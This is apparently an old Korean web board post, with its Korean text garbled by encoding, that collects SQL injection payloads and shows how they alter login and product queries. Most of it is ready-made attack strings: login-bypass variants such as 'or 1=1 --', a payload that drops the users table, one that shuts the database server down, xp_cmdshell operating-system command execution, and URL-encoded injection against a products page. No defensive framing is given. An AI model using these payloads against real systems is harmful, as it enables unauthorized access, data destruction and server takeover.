BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: sql Sql ÀÎÁ§¼Ç Á¶È¸¼ö: 7371


"Select * from table1 where login=' fuck ' and password=' hi' or 'a'='a ' "

Åë¿ë
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
¶Ç´Â

fuck ' --
fuck " --

Username: ' or users.userName like 'a%' ---
Password: [Anything]

Once again, this performs an injected SQL query against our users table:

select userName from users where userName='' or
users.userName like 'a%' --' and userPass=''


select 1; select 1+2; select 1+3;

...would return three recordsets. The first would contain the value 1, the
second the value 3, and the third the value 4, etc. So, if we logged in with the
following credentials:

Username: ' or 1=1; drop table users; --
Password: [Anything]



Username: '; shutdown with nowait; --
Password: [Anything]

This would make our login.asp script run the following query:

select userName from users where userName='';
shutdown with nowait; --' and userPass=''




Username: '; exec master..xp_xxx; --
Password: [Anything]

All we have to do is pick the appropriate extended stored procedure and replace
xp_xxx with its name in the sample above. For example, if IIS was installed on
the same machine as SQL Server (which is typical for small one/two man setups),
then we could restart it by using the xp_cmdshell extended stored procedure
(which executes a command string as an operating-system command) and IIS reset.
All we need to do is enter the following user credentials into our getlogin.asp
page:

Username: '; exec master..xp_cmdshell 'iisreset'; --
Password: [Anything]

This would send the following query to SQL Server:

select userName from users where userName='';
exec master..xp_cmdshell 'iisreset'; --' and userPass=''



http://localhost/products.asp?productId=0%20or%201=1

Each %20 in the URL represents a URL-encoded space character, so the URL really
looks like this:

http://localhost/products.asp?productId=0 or 1=1

When used in conjunction with products.asp, the query looks like this:

select prodName from products where id = 0 or 1=1

Using a bit of know-how and some URL-encoding, we can just as easily pull the
name of the products field from the products table:

http://localhost/products.asp?productId=0%...%20having%201=1




°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2005/01/05 10:20 from 218.38.148.205

  nc ¸¦ ÀÌ¿ëÇÑ Å¬·¡½º ½ºÄµ ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ Crons Site Script  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡